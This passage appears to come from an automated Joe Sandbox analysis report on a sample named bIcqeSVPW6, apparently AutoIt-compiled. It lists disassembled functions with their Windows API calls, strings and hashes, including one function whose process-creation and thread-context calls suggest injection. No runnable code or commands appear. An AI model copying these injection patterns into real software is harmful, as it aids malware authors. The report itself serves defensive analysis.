Part of subcall function 00A141A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A139FE,?,00000001), ref: 00A141DB

_free.LIBCMT ref: 00A836B7
_free.LIBCMT ref: 00A836FE

Part of subcall function 00A1C833: __wsplitpath.LIBCMT ref: 00A1C93E
Part of subcall function 00A1C833: _wcscpy.LIBCMT ref: 00A1C953
Part of subcall function 00A1C833: _wcscat.LIBCMT ref: 00A1C968
Part of subcall function 00A1C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00A1C978

Strings

Bad directive syntax error, xrefs: 00A836E4
>>>AUTOIT SCRIPT<<<, xrefs: 00A83491

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 5e073c919ef7b48c60e5d3baecb50f0d5a633db2209f2a402ecafee416442e30
Instruction ID: 56934ccbf7e6987f8e426fc25e02c91e61ebc6edc192ec2e8c0d9e78b48c03c6
Opcode Fuzzy Hash: 5e073c919ef7b48c60e5d3baecb50f0d5a633db2209f2a402ecafee416442e30
Instruction Fuzzy Hash: 47919372910219EFCF04EFA8CD919EEB7B4FF09710F144429F816AB291EB749A45CB50

Function 00A14A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A15374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AD1148,?,00A161FF,?,00000000,00000001,00000000), ref: 00A15392

Part of subcall function 00A149FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00A14A1D

_wcscat.LIBCMT ref: 00A82D80
_wcscat.LIBCMT ref: 00A82DB5

Strings

\Include\, xrefs: 00A14B0A
\, xrefs: 00A82DA2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: 372199bac2cfe73683915343d7395a03386e2c02d73480c34528bab5633691ad
Instruction ID: 480c0c1ef1c8d0d19fa0037a0b0f39c25c3c1539ac975651fdf00149e9c1ed73
Opcode Fuzzy Hash: 372199bac2cfe73683915343d7395a03386e2c02d73480c34528bab5633691ad
Instruction Fuzzy Hash: 985175714093409FC714EFA5DA91AEAB7F4FFA9310B408A2FF646C3261EB309545CB52

Function 00A334AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00A334FE

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00A33539
__wopenfile.LIBCMT ref: 00A33549

Strings

<G, xrefs: 00A334CD, 00A334F0, 00A334FC

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 89e476ca39bc3bcba603d74e0ff13848dbcd20d2d47d31cd068bcb1064c58e06
Instruction ID: 9dda15dd3fd0f2f1027b6e9df2a6a10ac1b00dd233851c62ebf1a34f86532d74
Opcode Fuzzy Hash: 89e476ca39bc3bcba603d74e0ff13848dbcd20d2d47d31cd068bcb1064c58e06
Instruction Fuzzy Hash: 181102B2A04306AFDF22BF708D4277E76B4AF45350F158825F815CB282EB34CA0197A1

Function 00A2D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A2D28B,SwapMouseButtons,00000004,?), ref: 00A2D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A2D28B,SwapMouseButtons,00000004,?,?,?,?,00A2C865), ref: 00A2D2DD
RegCloseKey.KERNELBASE(00000000,?,?,00A2D28B,SwapMouseButtons,00000004,?,?,?,?,00A2C865), ref: 00A2D2FF

Strings

Control Panel\Mouse, xrefs: 00A2D2BA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 16306bbe423e082206d388d5986e3e6a50c58c19ddc3224c7d80e765c54ced9f
Instruction ID: 82eae6c47e1261251c3df6c866dd0b3c18d41be243144ff8656463227dc1afb3
Opcode Fuzzy Hash: 16306bbe423e082206d388d5986e3e6a50c58c19ddc3224c7d80e765c54ced9f
Instruction Fuzzy Hash: DC112776611228BFDB20CFA8EC84EAE7BB8EF44744B104469A906DB110E731EE459B60

Function 00C750A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00C7585B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C758F1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C75913

Memory Dump Source

Source File: 00000000.00000002.1482114122.0000000000C73000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c73000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
Instruction ID: 29b097d36dbbcd406f0a314d29980b8b3c7950131bfcf79e3d2093868dfc2cb5
Opcode Fuzzy Hash: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
Instruction Fuzzy Hash: 2D620C30A14658DBEB24CFA4C851BEEB376EF58300F1091A9D11DEB390E7B59E81CB59

Function 00A5C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00A14517: _fseek.LIBCMT ref: 00A1452F

Part of subcall function 00A5C56D: _wcscmp.LIBCMT ref: 00A5C65D
Part of subcall function 00A5C56D: _wcscmp.LIBCMT ref: 00A5C670

_free.LIBCMT ref: 00A5C4DD
_free.LIBCMT ref: 00A5C4E4
_free.LIBCMT ref: 00A5C54F

Part of subcall function 00A31C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00A37A85), ref: 00A31CB1
Part of subcall function 00A31C9D: GetLastError.KERNEL32(00000000,?,00A37A85), ref: 00A31CC3

_free.LIBCMT ref: 00A5C557

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction ID: f246da38dac2cb18d8d72cf58c7ff78dcd7291148070bd960564b8143807b910
Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction Fuzzy Hash: 48514CB1904218AFDF249F68DC81BADBBB9FF48310F1000AEF659A3241DB755A848F59

Function 00A140E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A83725
GetOpenFileNameW.COMDLG32 ref: 00A8376F

Part of subcall function 00A1660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A153B1,?,?,00A161FF,?,00000000,00000001,00000000), ref: 00A1662F

Part of subcall function 00A140A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A140C6

Strings

X, xrefs: 00A8373E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: fce49fcb670122033eab066fe1b6d1e0e068727d46d21ee06a5a4372580518ef
Instruction ID: cd6f57d6c2dcd033f0251d2fe8794253af0263325ba4330803039a91402664c5
Opcode Fuzzy Hash: fce49fcb670122033eab066fe1b6d1e0e068727d46d21ee06a5a4372580518ef
Instruction Fuzzy Hash: C721E771A10288AFCF01DFD8C805BEE7BF99F49300F00801AE405EB241DBB49AC98F65

Function 00A5C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00A5C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A5C746

Strings

aut, xrefs: 00A5C740

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 4c12a25f076a713256178ed88f765807005f4dc6373e15421b3c59e5a661a76b
Instruction ID: dfe7202891538dd602accac79a7344630f78a5584c4e9df8b05696a85b1ddff0
Opcode Fuzzy Hash: 4c12a25f076a713256178ed88f765807005f4dc6373e15421b3c59e5a661a76b
Instruction Fuzzy Hash: 5DD05E7160030EBBDF10EBA0DC0EFCAB76CA700B04F0005A17750A50B1DEB0E6DA8B54

Function 00A6F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a87804d124d43cdf014d100df8797f4e2a5f057bfd32ed448254d616f82465
Instruction ID: c75f9644ed6feff7d41d622e5d5306e9d35a54dbbc4eb29f8a1ba4269d97dd8a
Opcode Fuzzy Hash: a2a87804d124d43cdf014d100df8797f4e2a5f057bfd32ed448254d616f82465
Instruction Fuzzy Hash: EEF159716083019FC710DF28D985B5AB7F5FF88314F14896EF9999B292DB30E945CB82

Function 00A14FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A15022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A150CB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 7c20d7b72c70314c9f4d546cf9ab80a497f59631bc18dacd13ff426d63bfbb2e
Instruction ID: 0b27c50ed4f03d6de2b59c8aab311f4d8ee69828dacb7476a6e307902e581495
Opcode Fuzzy Hash: 7c20d7b72c70314c9f4d546cf9ab80a497f59631bc18dacd13ff426d63bfbb2e
Instruction Fuzzy Hash: D5316BB1A05701DFC721EFB4D8456DBBBE4BB88308F00092EF59A86241E771A985CB92

Function 00A3395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00A33973

Part of subcall function 00A381C2: __NMSG_WRITE.LIBCMT ref: 00A381E9
Part of subcall function 00A381C2: __NMSG_WRITE.LIBCMT ref: 00A381F3

__NMSG_WRITE.LIBCMT ref: 00A3397A

Part of subcall function 00A3821F: GetModuleFileNameW.KERNEL32(00000000,00AD0312,00000104,00000000,00000001,00000000), ref: 00A382B1
Part of subcall function 00A3821F: ___crtMessageBoxW.LIBCMT ref: 00A3835F

Part of subcall function 00A31145: ___crtCorExitProcess.LIBCMT ref: 00A3114B
Part of subcall function 00A31145: ExitProcess.KERNEL32 ref: 00A31154

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,00000001,00000000,?,?,00A2F507,?,0000000E), ref: 00A3399F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 9ea461b5decdedcdf77030a25b77e5984989a6e492f215241d30b1b16699b514
Instruction ID: a652336ea4c1afd8ece7f27a99f27b408f0baac3085f21deb8b143bc37b0481a
Opcode Fuzzy Hash: 9ea461b5decdedcdf77030a25b77e5984989a6e492f215241d30b1b16699b514
Instruction Fuzzy Hash: 6B01F17334A301DAEE217B64ED62B7E73589F81720F21012AF502DB282DFB4DD4086A0

Function 00A5C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00A5C385,?,?,?,?,?,00000004), ref: 00A5C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A5C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00A5C708
CloseHandle.KERNEL32(00000000,?,00A5C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A5C70F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 524d8b957e23926fcea6bf4f8fc675c1566fa613bacbd1fcfff98d279e5bfd5f
Instruction ID: 95ff32e4d69aeee10e31a18174c61549ccecfa0be82fc3255e7fca1062c30ad3
Opcode Fuzzy Hash: 524d8b957e23926fcea6bf4f8fc675c1566fa613bacbd1fcfff98d279e5bfd5f
Instruction Fuzzy Hash: BCE08632240214BBD7215BA4EC09FCA7B18AB05771F104211FB14690E09BB125928798

Function 00A5BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A5BB72

Part of subcall function 00A31C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00A37A85), ref: 00A31CB1
Part of subcall function 00A31C9D: GetLastError.KERNEL32(00000000,?,00A37A85), ref: 00A31CC3

_free.LIBCMT ref: 00A5BB83
_free.LIBCMT ref: 00A5BB95

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction ID: d7c314878585efa6fdbc5fcf6609188b0cfa4df40eee72c96afafdc1bc21d960
Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction Fuzzy Hash: CDE02EA170070087CA30A738AF48EB323CC2F04363F04180EB829E3182EF70F84088B8

Function 00A13A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00A13A73

Part of subcall function 00A31405: __lock.LIBCMT ref: 00A3140B

Part of subcall function 00A13ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A13AF3
Part of subcall function 00A13ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A13B08

Part of subcall function 00A13D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00A13AA3,?), ref: 00A13D45
Part of subcall function 00A13D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00A13AA3,?), ref: 00A13D57
Part of subcall function 00A13D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD1148,00AD1130,?,?,?,?,00A13AA3,?), ref: 00A13DC8
Part of subcall function 00A13D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00A13AA3,?), ref: 00A13E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A13AB3

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: e430d5b80125097edffe534cec7b08cefa0c92bd024ebca6c7ba9b3b1c241f71
Instruction ID: 952d4e4f4ea65781da66885412031e1a7544d4b0c4c8b6a00b46cdfdd85f822c
Opcode Fuzzy Hash: e430d5b80125097edffe534cec7b08cefa0c92bd024ebca6c7ba9b3b1c241f71
Instruction Fuzzy Hash: BA11AF71905341AFC300EFA9ED45A5AFBE8FF94750F008A1FF586872A1DB709586CB92

Function 00A3E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00A3EA29
__close_nolock.LIBCMT ref: 00A3EA42

Part of subcall function 00A37BDA: __getptd_noexit.LIBCMT ref: 00A37BDA

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: a4e7477f7e4db6c9d22d9df173a5a696cc00cd4c1974bbb6b19689700e9fc163
Instruction ID: 22ddd8bbff39a6be2f630ab0835875045c21825f862f25caa14879bfeddfe740
Opcode Fuzzy Hash: a4e7477f7e4db6c9d22d9df173a5a696cc00cd4c1974bbb6b19689700e9fc163
Instruction Fuzzy Hash: 5211A1B2D056149ED722FFA8CA4275CBAA16F82372F264341F4615F1E2CBB49C418BA5

Function 00A2F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00A3395C: __FF_MSGBANNER.LIBCMT ref: 00A33973
Part of subcall function 00A3395C: __NMSG_WRITE.LIBCMT ref: 00A3397A
Part of subcall function 00A3395C: RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,00000001,00000000,?,?,00A2F507,?,0000000E), ref: 00A3399F

std::exception::exception.LIBCMT ref: 00A2F51E
__CxxThrowException@8.LIBCMT ref: 00A2F533

Part of subcall function 00A36805: RaiseException.KERNEL32(?,?,0000000E,00AC6A30,?,?,?,00A2F538,0000000E,00AC6A30,?,00000001), ref: 00A36856

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: d695d2f8d824c7b3086e4ecbe084eeeb733860f5ef75151aafc2de02176e58bc
Instruction ID: 85964ace2a8383658ef27f619af7272a0bb420f480c7bdd2cc43aa25ec646a82
Opcode Fuzzy Hash: d695d2f8d824c7b3086e4ecbe084eeeb733860f5ef75151aafc2de02176e58bc
Instruction Fuzzy Hash: 13F0A47110422DBBDB04BF9CEA019DE77F8AF04394F608539F90896581DBB1D69086A5

Function 00A335E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

__lock_file.LIBCMT ref: 00A33629

Part of subcall function 00A34E1C: __lock.LIBCMT ref: 00A34E3F

__fclose_nolock.LIBCMT ref: 00A33634

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
